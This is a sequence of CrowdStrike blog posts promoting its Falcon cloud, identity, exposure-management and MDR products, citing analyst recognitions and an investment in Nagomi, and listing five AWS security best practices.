• Deep Runtime Visibility: With comprehensive monitoring across runtime environments, security teams can rapidly identify vulnerabilities across cloud infrastructure, workloads, applications, APIs, GenAI and data to eliminate security gaps.
• Runtime Protection: Fueled by industry-leading threat intelligence, Falcon Cloud Security detects and prevents cloud-based threats in real-time.
• Industry-Leading MDR and CDR: By unifying industry-leading managed threat hunting and deep visibility across cloud, identity and endpoints, CrowdStrike’s CDR accelerates detection and response across every stage of a cloud attack, even as threats move laterally from cloud to endpoint.
• Shift-Left Security: By embedding security early in the application development lifecycle, Falcon Cloud Security enables teams to proactively address potential issues, streamlining development and driving efficiency across development and security operations.

Application security is cloud security — but no vendor has successfully incorporated a way to protect the apps that companies build to support business-critical functions and drive growth and revenue. CrowdStrike now provides a single, holistic solution for organizations to secure everything they create and run in the cloud.

CrowdStrike Expands Cloud Detection and Response Leadership

CrowdStrike’s unified approach to CDR brings together world-class adversary intelligence, elite 24/7 threat hunting services and the industry’s most complete CNAPP. We are expanding our threat hunting with unified visibility across and within clouds, identities and endpoints to stop every stage of a cloud attack — even as threats move laterally from cloud to endpoint.

Our new CDR innovations are built to deliver the industry’s most comprehensive CDR service, drive consolidation across cloud security operations and stop breaches. This release empowers users to:

• Protect Cloud Control Planes: Beginning with Microsoft Azure, CrowdStrike expands visibility into cloud control plane activity, complimenting existing threat hunting for cloud runtime environments.
• Stop Cloud Identity Threats: Our unified platform approach enables cloud threat hunters to monitor and prevent compromised users and credentials from being exploited in cloud attacks.
• Prevent Lateral Movement: The CrowdStrike Falcon platform enables CrowdStrike cloud threat hunters to track lateral movement from cloud to endpoint, facilitating rapid response and actionable insights for decisive remediation from indicators to root cause.

By uniting industry-leading managed threat hunting and deep visibility across cloud, identity and endpoints, CrowdStrike accelerates detection and response at every stage of a cloud attack. Our threat hunters rapidly detect, investigate and respond to suspicious behaviors and new attacker tradecraft while alerting customers of the complete attack path analysis of cloud-based threats.

Stop Breaches from Code to Cloud with CrowdStrike

Traditional approaches to securing cloud environments and applications have proven slow and ineffective. Security teams are overwhelmed with cybersecurity tools and alerts but struggle to gain the visibility they need to prioritize threats. Security engineers, often outnumbered by developers, must secure applications developed at a rapid pace. Tool fragmentation and poor user experience has led to more context switching, stress and frustration among security practitioners, and greater risk for organizations overall.

CrowdStrike, the pioneer of cloud-native cybersecurity, was born in the cloud to protect the cloud. We have been consistently recognized for our industry-leading cloud security strategy. Our innovations announced today continue to demonstrate our commitment to staying ahead of modern threats and building the technology our customers need to stop breaches.

Businesses must act now to protect their cloud environments — and the mission-critical applications and data within them — from modern adversaries. CrowdStrike is here to help.

As adversaries become faster and stealthier, they relentlessly search for vulnerable assets to exploit. Meanwhile, your digital footprint is expanding, making it increasingly challenging to keep track of all of your assets. It’s no wonder 76% of breaches in 2023 were due to unknown and unmanaged internet-facing assets.

Against this backdrop, it’s more critical than ever for organizations to maintain a continuous and comprehensive understanding of their entire attack surface. This is where CrowdStrike Falcon® Exposure Management comes in:

In the field of exposure management, the value of external attack surface management (EASM) cannot be overstated. In short, EASM helps organizations identify known and unknown internet-facing assets, get real-time visibility into their exposures and vulnerabilities, and prioritize remediation to reduce intrusion risk.

Integrated into Falcon Exposure Management are the robust EASM capabilities of CrowdStrike Falcon® Surface, which uses a proprietary real-time engine to continuously scan the internet, and map and index more than 95 billion internet-facing assets annually. This gives organizations a vital “outside-in” perspective on the exposure of these assets and helps security teams prioritize and address vulnerabilities — not based on generic vulnerability severity scores but based on real-world adversary behavior and tactics from CrowdStrike® Counter Adversary Operations threat intelligence.

The EASM capabilities of Falcon Exposure Management are best-in-class. But don’t just take it from us. Here’s what CrowdStrike customers had to say.

93% Willing to Recommend CrowdStrike

CrowdStrike is the only vendor named Customers’ Choice in the 2024 Gartner “Voice of the Customer” Report for External Attack Surface Management, with 93% of respondents saying they are willing to recommend CrowdStrike.

The “Voice of the Customer” is a document that synthesizes Gartner Peer Insights’ reviews into insights for IT decision makers. Here’s a sampling of the individual reviews and ratings on the Gartner Peer Insights page:

“Falcon Surface is the EASM you need.”

“The tool gives critical insight into your attack surface helping to show what you don’t know.”

“Strategic assessing for internet exposed assets.”

“A market analysis of external vulnerability analysis was carried out and after testing the product we were convinced to purchase it for the company.”

“Effective ASM solution byte per byte.”

“Easy and continuous vulnerability assessment, effective risk prioritization, accuracy on remediations guidance.”

Our mission is clear: to stop breaches. Understanding and reducing risk is critical to stopping the breach, and we thank our customers for their support and validation of the unified CrowdStrike Falcon® XDR platform as the definitive cybersecurity platform.

Falcon Exposure Management: A Critical Component of the Falcon Platform

Organizations are embracing cybersecurity consolidation to reduce cost and complexity while improving security outcomes. Understanding the reduction of cyber risk across the modern attack surface is a critical component of any organization’s cybersecurity strategy. 

Falcon Exposure Management unifies real-time security data from Falcon Surface for EASM, CrowdStrike Falcon® Discover for asset, account and app discovery, and CrowdStrike Falcon® Spotlight for vulnerability management. CrowdStrike received a Customers’ Choice distinction in the 2024 Gartner® Peer Insights Voice of the Customer for Vulnerability Assessment. 

With AI-powered vulnerability management and a comprehensive visual mapping of all connected assets, Falcon Exposure Management dramatically speeds up detection and response times, transforming reactive operations into proactive cybersecurity strategies to stop breaches before they happen. Integration with real-time threat intelligence correlates exposures with adversary behavior to help prioritize based on business impact and the likelihood of real-world exploitation. 

While traditional approaches to exposure management use disjointed products, only CrowdStrike delivers Falcon Exposure Management from the Falcon platform, making it fast and easy for customers to deploy the exposure management capabilities that customers love using the single lightweight Falcon agent and single console.

By deploying Falcon Exposure Management on the Falcon platform, organizations can realize incredible benefits such as a projected 200% faster CVE prioritization to respond quickly to critical vulnerabilities, up to 75% reduction in attack surface to lower the risk of a breach and up to $200,000 USD in annual savings by consolidating point products.

 

*Based on 32 overall reviews as of December 2023.

GARTNER is a registered trademark and service mark, and PEER INSIGHTS is a trademark and service mark, of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from CrowdStrike. Gartner Peer Insights content consists of the opinions of individual end users based on their own experiences with the vendors listed on the platform, should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.

Additional Resources

• Read the 2024 Gartner “Voice of the Customer” Report for EASM.
• Visit the Falcon Exposure Management website to learn more.
• Schedule a Falcon Exposure Management demo.
• Register for a hands-on workshop: Empowering Proactive Protection with Falcon Exposure Management.
• Watch the Falcon Exposure Management “Internet Exposure Identification” demo.
• See Falcon Exposure Management in action.
• Read the Falcon Exposure Management data sheet.

The industry’s first identity detection and response (ITDR) analyst report names CrowdStrike an Overall Leader and a “cyber industry force.”

In KuppingerCole Leadership Compass, Identity Threat Detection and Response (ITDR) 2024: IAM Meets the SOC, CrowdStrike was named a Leader in every category — Product, Innovation, Market and Overall Ranking — and positioned the highest for Innovation among all eight vendors evaluated. We received the top overall position in the report and a perfect 5/5 rating in every criteria, including security, functionality, deployment, interoperability, usability, innovativeness, market position, financial strength and ecosystem.

CrowdStrike pioneered ITDR to stop modern attacks with the industry’s first and only unified platform for identity protection and endpoint security powered by threat intelligence and adversary tradecraft — all delivered on a single agent. The market has continued to recognize our leadership, with CrowdStrike being positioned furthest to the right of all eight vendors evaluated in KuppingerCole’s report.

A Leader in Innovation

In 2023, 75% of attacks used to gain initial access were malware-free, highlighting the prevalence of identity-based attacks and use of compromised credentials. Since releasing CrowdStrike Falcon® Identity Threat Protection in 2020, CrowdStrike has been constantly innovating on the product to deliver a mature solution that stops modern identity attacks.

In the report, CrowdStrike was positioned furthest to the right and highest in Innovation, demonstrating our commitment to delivering cutting-edge technology. “CrowdStrike is a cyber industry force, and its Falcon Identity Protection demonstrates real attention to detail where threats are related,” KuppingerCole states.

The cloud-native architecture of Falcon Identity Protection is another point of differentiation, delivering the speed and scale that businesses need, with minimal hardware requirements.

“Offered as a cloud-native SaaS service, Falcon Identity Protection component requires a minimal on-premises footprint, requiring only a lightweight Falcon sensor on the Active Directory (AD) domain controllers. This architecture also enables packet-level inspection and real-time alerting of suspicious events,” states the report.

CrowdStrike Focuses Where Threats Are

In our mission to stop breaches, CrowdStrike focuses where identity threats often originate: in Microsoft identity environments. This is reflected in the report, with KuppingerCole describing Microsoft environments as “the entry point to attack vectors.”

“Falcon Identity Protection excels at its deep coverage of Microsoft environments, including on-premises AD and Azure-based environments. The coverage ranges from aging AD protocols for domain controller replication, to password hash synchronization over AD Connect, to Azure based attacks on Entra ID,” states the report.

CrowdStrike’s protection of Microsoft identity stores extends into specific product features and services that KuppingerCole also highlighted in its report.

“Given CrowdStrike’s long history in InfoSec and SOC practices, Falcon Identity Protection offers unique features to help bridge identity administration performed by IT and identity security. It does this by providing guidance to InfoSec personnel who may not have deep knowledge of AD and Entra ID.”

With these features and our continuing emphasis on stopping identity-based attacks on Microsoft environments, KuppingerCole said CrowdStrike delivers “very strong protection for Microsoft environments” in its report.

Delivered from the Unified Falcon Platform

CrowdStrike firmly believes ITDR is a problem that cannot be addressed in isolation by point products. Of all of the vendors evaluated in the report, CrowdStrike is the only one that delivers identity security as a capability tightly integrated into a unified platform.

Our innovative approach of combining endpoint and identity protection into the AI-native CrowdStrike Falcon® platform with a single agent, powered with threat intel and adversary tradecraft, is key to stopping identity breaches in real time. The unified approach is shown to accelerate response time with projections calculating up to 85% faster detection of identity attacks and lower total cost of ownership, delivering up to $2 million USD in savings over three years.

Another CrowdStrike advantage is our extensive partner network that delivers industry-leading capabilities such as real-time response as part of Falcon Identity Protection.

“The company’s API ecosystem offers REST and GraphQL APIs for most of its functionalities, including real-time response to identity threats. This approach not only offers compliance with current tech standards but also portrays CrowdStrike’s forward-thinking strategy, promising near-term enhancements to further open up their platform.”

The Future of Identity Security

With this report, CrowdStrike is the proven leader in identity threat protection, parallelling our industry leadership in endpoint security, cloud security, managed detection and response, threat intelligence and risk-based vulnerability management.

Thanks to all of the CrowdStrike customers that use our platform every day to stop breaches. We’re committed to delivering the best technology and services on the market for you!

Additional Resources

• Read the report, KuppingerCole Leadership Compass, Identity Threat Detection and Response (ITDR) 2024: IAM Meets the SOC.
• Register for a complimentary Identity Security Risk Review.
• Read this blog: “CrowdStrike Extends Identity Security Capabilities to Stop Attacks in the Cloud.”
• Visit the Falcon Identity Protection product page to learn more. 

The #1 global managed detection and response (MDR) provider and pioneer continues to dominate. Today, CrowdStrike was named a Leader in the 2024 IDC MarketScape: Worldwide Managed Detection and Response 2024 Vendor Assessment¹ among the 19 vendors evaluated in the report. 

CrowdStrike was also recently named a Leader in Frost & Sullivan’s 2024 Frost Radar: Managed Detection and Response.

The global demand for MDR continues to surge as businesses face a harsh reality: While many struggle to recruit the cybersecurity talent they need, adversaries are getting faster and stealthier. To stay ahead of emerging threats, organizations must operate at maximum efficiency and employ the right blend of skills, processes and cutting-edge technology. 

CrowdStrike Falcon® Complete delivers 24/7 managed detection and response, powered by the AI-native CrowdStrike Falcon® XDR platform. Operating as a seamless extension of customers’ teams, Falcon Complete combines advanced threat detection, investigation and response with industry-leading threat intelligence and threat hunting to accelerate mean-time-to-respond (MTTR), narrow the cybersecurity skills gap and thwart even the most sophisticated attacks.

As a pioneer in MDR, the emerging cloud detection and response (CDR) category and adversary intelligence, CrowdStrike is consistently recognized by customers, analysts and third-party awards programs for its industry-leading MDR offering. 

IDC MarketScape: CrowdStrike a Leader in WW MDR

CrowdStrike has been named a Leader in the 2024 IDC MarketScape for worldwide MDR report. CrowdStrike was also named a Leader in the IDC MarketScape: U.S. Managed Detection Response Services 2021 Vendor Assessment.²

 

IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of ICT suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market and business execution in the short-term. The Strategy score measures alignment of vendor strategies with customer requirements in a 3-5-year timeframe. Vendor market share is represented by the size of the circles. Vendor year-over-year growth rate relative to the given market is indicated by a plus, neutral or minus next to the vendor name.

The report noted…

“Falcon Complete offers a unique flat analyst operating model for MDR by eliminating analyst tiers and forming interchangeable “Fire Teams” — with each respective Fire Team capable of operating independently and delivering MDR services to customers 24×7. In this approach, every MDR security analyst is an experienced incident response expert capable of investigating and responding to any endpoint, cloud, identity, or multidomain threat they encounter. This model enables Falcon Complete to more efficiently and nimbly scale and balance resources across all Fire Teams while delivering positive security outcomes to every supported customer. The CrowdStrike Falcon platform and Falcon Complete MDR services are 100% cloud native and cloud delivered.”

Speed is a defining characteristic of Falcon Complete. With the fastest observed adversary breakout time down to just over two minutes in 2023, organizations are under immense pressure to quickly identify and stop attacks. 

“Falcon Complete’s multi-domain detection and response capabilities accelerate the time it takes to find and stop sophisticated, lateral-moving attacks.”

CrowdStrike’s elite security analysts and threat hunters deliver a seamless MDR service enriched with integrated threat intelligence and high-fidelity telemetry from the Falcon platform. This allows for faster and more effective detection and response to stop breaches. 

“IDC recognizes that there is a push ‘to the platform’ that is occurring in cybersecurity. This is worthy of mention as CrowdStrike has a wide depth and breadth of capabilities built into their Falcon platform that provides the technology muscle for their MDR offering.”

Frost & Sullivan: CrowdStrike Growth Leader in MDR

CrowdStrike was also named a Leader in the Frost Radar: Managed Detection and Response 2024. In the report, Frost & Sullivan named CrowdStrike the growth leader among 22 vendors evaluated and an “innovator and powerhouse” in the MDR sector.

“CrowdStrike delivers its services to companies of all sizes and across all industry verticals …. The company leverages its success in other security product and service domains, including endpoint security, cloud security, identity protection, XDR and more to power and cross-sell its MDR services while offering complimentary services that provide additional value for customers looking to address specific use cases.”

Our continued growth in MDR is accelerated by Falcon Complete for Service Providers, which allows service providers to enhance their offerings and provide their customers the highest level of protection powered by our industry-leading MDR service.

“In September 2023, CrowdStrike launched Falcon Complete for Service Providers, which allows MSSPs and MSPs to license the company’s Falcon Complete MDR service, leveraging its expert team and technology to deliver 24/7 monitoring and security to their customers. This program is flexible, allowing service partners to co-brand, white-label and customize the services they provide to unlock significant growth potential.”

Ranking CrowdStrike high in innovation, Frost & Sullivan called Falcon Complete a “world-class security service” in the MDR sector, also stating:

“CrowdStrike leverages its impressive R&D budget and expert understanding of the challenges and trends in the security space to hold on to its position as an innovator and powerhouse in the MDR sector and in the cybersecurity industry as a whole.”

Frost & Sullivan also noted CrowdStrike’s technology advantage of delivering Falcon Complete from the unified Falcon platform. This approach allows us to extend our MDR capabilities across endpoints, identities, cloud workloads and third-party data to deliver end-to-end response and remediation across key attack surfaces.

“CrowdStrike recently expanded its MDR portfolio, extending its 24/7 managed detection and response service to incorporate trusted third-party telemetry, data sources, and automated response actions. These integrations are powered by more than 20 CrowdStrike alliance partners, including Cisco, Fortinet, Mimecast, Proofpoint and Zscaler.”

Gold Standard of MDR

As the pioneer of MDR, CrowdStrike remains the gold standard, delivering outcomes, not homework, for thousands of organizations worldwide. 

Falcon Complete received the highest detection coverage and was the only MDR to detect 99% of adversary techniques in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Security Services. And our best-in-class CrowdStrike Breach Prevention Warranty gives customers additional peace of mind knowing we stand behind our claims.

Thank you to the IDC MarketScape and Frost & Sullivan for the recognition and to all of the hardworking CrowdStrikers for delivering the best MDR service on the market! 

Additional Resources

• Download the excerpt for the 2024 IDC MarketScape for Worldwide Managed Detection and Response report.
• Generate your own tailored MDR business case using the CrowdStrike ROI Calculator for MDR.
• Learn why our customers routinely see over 403% ROI, as assessed in Forrester’s Total Economic Impact (TEI) of CrowdStrike Falcon Complete MDR.
• Discover the power of Falcon Complete MDR with the industry’s only end-to-end surgical remediation service — schedule your demo today.
• Contact CrowdStrike sales. 

 

1.  Doc #US49006922, April 2024
2. Doc #US48129921, August 2021

Preventable breaches are a common problem. According to research by Nagomi, a leader in the nascent field of automated security control assessment, 80% of breached organizations already had a tool in place that could have prevented it. 

One solution is to maximize the use of security tools they already have. Many enterprises grapple with ineffective and reactive security operations, worsened by using multiple disparate security products. Tools are purchased but not fully deployed, ROI is never realized and teams are stuck in a constant state of reacting to alerts rather than making progress.

“I don’t need more tools … I need to find a way to deploy the tools I already have more effectively,” one CISO told Nagomi. “This is why I don’t sleep at night … I have no way of knowing my security stack’s effectiveness.”

Facing increasingly fast and stealthy threat actors, CISOs need to know their security investments are effective against evolving threats. This is where Nagomi adds tremendous value. And with support from the CrowdStrike Falcon Fund, they are changing the way security teams balance risk and defense.  

Falcon Fund Invests in Nagomi

Falcon Fund has invested in Nagomi to help organizations boost the effectiveness of their existing security tools. Falcon Fund, an investment fund managed by CrowdStrike in partnership with Accel, is focused on global, cross-stage investments in companies that provide differentiated capabilities to joint customers.

Nagomi, formerly known as Vena Security and founded in January 2023, offers a proactive defense platform that enables customers to better use their security stacks to defend against current and emerging threats in the wild. Nagomi transforms fragmented best-of-breed solutions into best-of-suite security for customers by providing end-to-end visibility of defense capabilities mapped against MITRE ATT&CK®. With this information, security teams can prioritize the most urgent risks based on their unique threat profile and get prescriptive remediation plans to reduce threat exposure.

Nagomi is quickly innovating to deliver a threat-centered, data-driven and actionable approach to cybersecurity — one that enables customers to provide high-level security maturity metrics to executives while showing security practitioners exactly how to reduce risk, fix misconfigurations and make strategic decisions with business context.

Nagomi’s early success proves the value of its proactive approach to security. Within six months of launching, Nagomi was successfully deployed by Fortune 500 customers and has seen significant adoption in some of the world’s most complex security environments. 

How the Integration Works

Nagomi helps CrowdStrike customers get the most from their CrowdStrike Falcon® deployment by monitoring for configuration gaps and testing for attacks across their IT infrastructure as well as other security tools. Nagomi’s proactive defense platform uses CrowdStrike’s modern cloud architecture to ingest detections, host details and policy settings to map the deployment of CrowdStrike Falcon sensors. Nagomi then tests adversary tactics, techniques and procedures (TTPs) against the mapped deployment to recommend configuration policy changes.

The integration provides CrowdStrike customers with:

• Proactive risk management: Continuously analyze threats and corresponding defenses to identify gaps and remediation opportunities to prevent exploitation.
• Actionable defense plans: Pinpoint risk and modify configuration settings based on vulnerability to adversary TTPs.
• Clear communication: Share the current state of risk with peers and leadership using evidence-based data that considers business limitations and constraints.
  

Visit the CrowdStrike Marketplace to request the Nagomi integration and learn more.

Additional Resources

• Read Nagomi’s press release.
• Learn about CrowdStrike Falcon Fund.
• Read previous Falcon Fund blog posts on Aembit and Prelude Security.

Organizations are increasingly turning to cloud computing for IT agility, resilience and scalability. Amazon Web Services (AWS) stands at the forefront of this digital transformation, offering a robust, flexible and cost-effective platform that helps businesses drive growth and innovation. 

However, as organizations migrate to the cloud, they face a complex and growing threat landscape of sophisticated and cloud-conscious threat actors. Organizations with ambitious digital transformation strategies must be prepared to address these security challenges from Day One. The potential threat of compromise underscores the critical need to understand and implement security best practices tailored to the unique challenges of cloud environments. 

Central to understanding and navigating these challenges is the AWS shared responsibility model. AWS is responsible for delivering security of the cloud, including the security of underlying infrastructure and services. Customers are responsible for protecting their data, applications and resources running in the cloud. This model highlights the importance of proactive security measures at every phase of cloud migration and operation and helps ensure businesses maintain a strong security posture.

In this blog, we cover five best practices for securing AWS resources to help you gain a better understanding of how to protect your cloud environments as you build in the cloud. 

Best Practice #1: Know All of Your Assets

Cloud assets are not limited to compute instances (aka virtual machines) — they extend to all application workloads spanning compute, storage, networking and an extensive portfolio of managed services. 

Understanding and maintaining an accurate inventory of your AWS assets is foundational to securing your cloud environment. Given the dynamic nature of cloud computing, it’s not uncommon for organizations to inadvertently lose track of assets running in their AWS accounts, which can lead to risk exposure and attacks on unprotected resources. In some cases, accounts created early in an organization’s cloud journey may not have the standard security controls that were implemented later on. In another common scenario, teams may forget about and unintentionally remove mitigations put in place to address application-specific exceptions, exposing those resources to potential attack.

To maintain adequate insight and awareness of all AWS assets in production, organizations should consider implementing the following:

• Conduct asset inventories: Use tools and processes that provide continuous visibility into all cloud assets. This can help maintain an inventory of public and private cloud resources and ensure all assets are accounted for and monitored. AWS Resource Explorer and Cost Explorer can help discover new resources as they’re provisioned.
• Implement asset tagging and management policies: Establish and enforce policies for tagging cloud resources. This practice aids in organizing assets based on criticality, sensitivity and ownership, making it easier to manage and prioritize security efforts across the cloud environment. In combination with the AWS Identity and Access Management (IAM) service, tagging can also be used to dynamically grant access to resources via attribute-based access control (ABAC). 
• Integrate security tools for holistic visibility: Combine the capabilities of cloud security posture management (CSPM) with other security tools like endpoint detection and response (EDR) solutions. Integration of these tools can provide a more comprehensive view of the security landscape, enabling quicker identification of misconfigurations, vulnerabilities and threats across all AWS assets. AWS services including Trusted Advisor, Security Hub, GuardDuty, Config and Inspector provide actionable insights to help security and operations teams improve their security posture.

CrowdStrike Falcon® Cloud Security makes it easy to implement these practices by offering a consolidated platform that integrates with AWS features to maintain coverage across a customer’s entire multi-account environment. Falcon Cloud Security offers CSPM, which leverages AWS EventBridge, IAM cross-account roles and CloudTrail API audit telemetry to provide continuous asset discovery, scan for misconfigurations and suspicious behavior, improve least-privilege controls and deploy runtime protection on EC2 and EKS clusters as they’re provisioned. It guides customers on how to secure their cloud environments to accelerate the learning of cloud security skills and the time-to-value for cloud initiatives. Cloud Operations teams can deploy AWS Security Hub with the CrowdStrike Falcon® Integration Gateway to view Falcon platform detections and trigger custom remediations inside AWS. AWS GuardDuty leverages CrowdStrike Falcon® Adversary Intelligence indicators of compromise and can provide an additional layer of visibility and protection for cloud teams.

Best Practice #2: Enforce Multifactor Authentication (MFA) and Use Role-based Access Control in AWS

Stolen credentials pose a severe threat — whether they are user names and passwords or API key IDs and secrets — allowing adversaries to impersonate legitimate users and bypass identity-based access controls. This risk is exacerbated by scenarios where administrator credentials and hard-coded passwords are inadvertently stored in public-facing locations or within code repositories accessible online. Such exposures give attackers the opportunity to intercept live access keys, which they can use to authenticate to cloud services, posing as trusted users. 

In cloud environments, as well as on-premises, organizations should adopt identity security best practices such as avoiding use of shared credentials, assigning least-privilege access policies and using a single source of truth through identity provider federation and single sign-on (SSO). AWS services such as IAM, Identity Center and Organizations can facilitate secure access to AWS services by supporting the creation of granular access policies, enabling temporary session tokens, and reporting on cross-account trusts and excessively permissive policies, thus minimizing the likelihood and impact of access key exposure. By implementing MFA in conjunction with SSO, role-based access and temporary sessions, organizations make it much harder for attackers to steal credentials and, more importantly, to effectively use them.

Falcon Cloud Security includes cloud infrastructure entitlement management (CIEM), which evaluates whether IAM roles are overly permissive and provides the visibility to make changes with awareness of which resources will be impacted. Additionally, Falcon Cloud Security conducts pre-runtime scanning of container images and infrastructure-as-code (IaC) templates to uncover improperly elevated Kubernetes pod privileges and hard-coded credentials to prevent credential theft and lateral movement. Adding the CrowdStrike Falcon® Identity Protection module delivers strong protection for Active Directory environments, dynamically identifying administrator and service accounts and anomalous or malicious use of credentials, and allowing integration with workload detection and response actions. 

Best Practice #3: Automatically Scan AWS Resources for Excessive Public Exposure

The inadvertent public exposure and misconfiguration of cloud resources such as EC2 instances, Relational Database Service (RDS) and containers on ECS and EKS through overly permissive network access policies pose a risk to the security of cloud workloads. Such lapses can accidentally open the door to unauthorized access to vulnerable services, providing attackers with opportunities to exploit weaknesses for data theft, launching further attacks and moving laterally within the cloud environment.

To mitigate these risks and enhance cloud security posture, organizations should:

• Implement automated security audits: Utilize tools like AWS Trusted Advisor, AWS Config and AWS IAM Access Analyzer to continuously audit the configurations of AWS resources and identify and remediate excessive public exposure or misconfigurations.
• Secure AWS resources with proper security groups: Configure security groups for logical groups of AWS resources to restrict inbound and outbound traffic to only necessary and known IPs and ports. Whenever possible, use network access control lists (NACLs) to restrict inbound and outbound access across entire VPC subnets to prevent data exfiltration and block communication with potentially malicious external entities. Services like AWS Firewall Manager provide a single pane of glass for configuring network access for all resources in an AWS account using VPC Security Groups, Web Application Firewall (WAF) and Network Firewall.
• Collaborate across teams: Security teams should work closely with IT and DevOps to understand the necessary external services and configure permissions accordingly, balancing operational needs with security requirements.

Falcon Cloud Security continuously monitors AWS service configurations for best practices, both in live environments and in pre-runtime IaC templates as part of a CI/CD or GitOps pipeline. Overly permissive network security policies are dynamically discovered and recorded as indicators of misconfiguration (IOMs), which are automatically correlated with all other security telemetry in the environment, along with insight into how the misconfiguration can be mitigated by the customer or maliciously used by the adversary.

Best Practice #4: Prioritize Alerts Based on Risk

Adversaries are becoming more skilled in attacking cloud environments, as evidenced by a 75% increase in cloud intrusions year-over-year in 2023. They are also growing faster: The average breakout time for eCrime operators to move laterally from one breached host to another host was just 62 minutes in 2023. The rise of new technologies, such as generative AI, has the potential to lower the barrier to entry for less-skilled adversaries, making it easier to launch sophisticated attacks. Amid these evolving trends, effective alert management is paramount.  

Cloud services are built to deliver a constant stream of API audit and service access logs, but sifting through all of this data can overwhelm security analysts and detract from their ability to focus on genuine threats. While some logs may indicate high-severity attacks that demand immediate response, most tend to be informational and often lack direct security implications. Generating alerts based on this data can be imprecise, potentially resulting in many false positives, each of which require SecOps investigation. Alert investigations can consume precious time and scarce resources, leading to a situation where noisy security alerts prevent timely detection and effective response.

To navigate this complex landscape and enhance the effectiveness of cloud security operations, several best practices can be adopted to manage and prioritize alerts efficiently:

• Prioritize alerts strategically: Develop a systematic approach to capture and prioritize high-fidelity alerts. Implementing a triage process based on the severity of events helps focus resources on the most critical investigations.
• Create context around alerts: Enhance alert quality by enriching them with correlated data and context. This additional information increases confidence in the criticality of alerts, enabling more informed decision-making regarding their investigation.
• Integrate and correlate telemetry sources: Improve confidence in prioritizing or deprioritizing alerts by incorporating details from other relevant data sources or security tools. This combination allows for a more comprehensive understanding of the security landscape, aiding in the accurate identification of genuine threats.
• Outsource to a competent third party: For organizations overwhelmed by the volume of alerts, partnering with a managed detection and response (MDR) provider can be a viable solution. These partners can absorb the event burden, alleviating the bottleneck and allowing in-house teams to focus on strategic security initiatives.

AWS Services like AWS GuardDuty, which is powered in part by CrowdStrike Falcon Adversary Intelligence indicators of compromise (IOCs), help surface and alert on suspicious and malicious activity within AWS accounts, prioritizing indicators of attack (IOAs) and IOCs based on risk severity. 

Falcon Cloud Security is a complete cloud security platform that unifies world-class threat intelligence and elite threat hunters. Falcon Cloud Security correlates telemetry and detections across IOMs, package vulnerabilities, suspicious behavior, adversary intelligence and third-party telemetry ingested through a library of data connectors to deliver a context-based risk assessment, which reduces false positives and automatically responds to stop breaches. 

Best Practice #5: Enable Comprehensive Logging

Adversaries that gain access to a compromised account can operate virtually undetected, limited only by the permissions granted to the account they used to break in. This stealthiness is compounded by the potential for log tampering and manipulation, where malicious actors may alter or delete log files to erase evidence of their activities. Such actions make it challenging to trace the adversary’s movements, evaluate the extent of data tampering or theft, and understand the full scope of the security incident. The lack of a comprehensive audit trail due to disabled or misconfigured logging mechanisms hinders the ability to maintain visibility over cloud operations, making it more difficult to detect and respond to threats.

In response, organizations can:

• Enable comprehensive logging across the environment: Ensure AWS CloudTrail logs, S3 server access logs, Elastic Load Balancer (ELB) access logs, CloudFront logs and VPC flow logs are activated to maintain a detailed record of all activities and transactions.
• Ingest and alert on logs in your SIEM: Integrate and analyze logs within your security information and event management (SIEM) system to enable real-time alerts on suspicious activities. Retain logs even if immediate analysis capabilities are lacking, as they may provide valuable insights in future investigations. 
• Ensure accuracy of logged data: For services behind proxies, like ELBs, ensure the logging captures original IP addresses from the X-Forwarded-For field to preserve crucial information for analysis.
• Detect and prevent log tampering: Monitor for API calls that attempt to disable logging and for unexpected changes in cloud services or account settings that could undermine logging integrity, in line with recommendations from the MITRE ATT&CK® framework. In addition, features such as MFA-Delete provide additional protection by requiring two-factor authentication to allow deletion of S3 buckets and critical data.

CrowdStrike Falcon Cloud Security for AWS

Falcon Cloud Security integrates with over 50 AWS services to deliver effective protection at every stage of the cloud journey, combining multi-account deployment automation, sensor-based runtime protection, agentless API attack and misconfiguration detection, and pre-runtime scanning of containers, Lambda functions and IaC templates. 

CrowdStrike leverages real-time IOAs, threat intelligence, evolving adversary tradecraft and enriched telemetry from across vectors such as endpoint, cloud, identity and more. This not only enhances threat detection, it also facilitates automated protection, remediation and elite threat hunting, aligned closely with understanding AWS assets, enforcing strict access control and authentication measures, and ensuring meticulous monitoring and management of cloud resources.

You can try Falcon Cloud Security through a Cloud Security Health Check, during which you’ll engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment, and identify misconfigurations, vulnerabilities and potential cloud threats.

Protecting AWS Resources with Falcon Next-Gen SIEM

CrowdStrike Falcon® Next-Gen SIEM unifies data, AI, automation and intelligence in one AI-native platform to stop breaches. Falcon Next-Gen SIEM extends CrowdStrike’s industry-leading detection and response and expert services to all data, including AWS logs, for complete visibility and protection. Your team can detect and respond to cloud-based threats in record time with real-time alerts, live dashboards and blazing-fast search. Native workflow automation lets you streamline analysis of cloud incidents and say goodbye to tedious tasks. 

For the first time ever, your analysts can investigate cloud-based threats from the same console they use to manage cloud workload security and CSPM. CrowdStrike consolidates multiple security tools, including next-gen SIEM and cloud security, on one platform to cut complexity and costs. Watch a 3-minute demo of Falcon Next-Gen SIEM to see it in action.

Additional Resources 

• Read about common cloud misconfigurations in this CrowdStrike white paper: Seven Easily Exploited Cloud Misconfigurations
• Download the CrowdStrike eBook, 8 Things Your Next SIEM Must Do, to understand the critical capabilities to look for when evaluating SIEM solutions.
• See why Forrester named CrowdStrike a Leader in The Forrester Wave: Cloud Workload Security, Q1 2024. 
• See for yourself how the industry-leading CrowdStrike Falcon platform protects against modern threats. Start your 15-day free trial today.

• As Porter Airlines scaled its business, it needed a unified cybersecurity platform to eliminate the challenges of juggling multiple cloud, identity and endpoint security products.
• Porter consolidated its cybersecurity strategy with the single-agent, single-console architecture of the AI-native CrowdStrike Falcon® XDR platform.
• With the Falcon platform, the airline has reduced cost and complexity while driving better security outcomes across its business and partner network. 

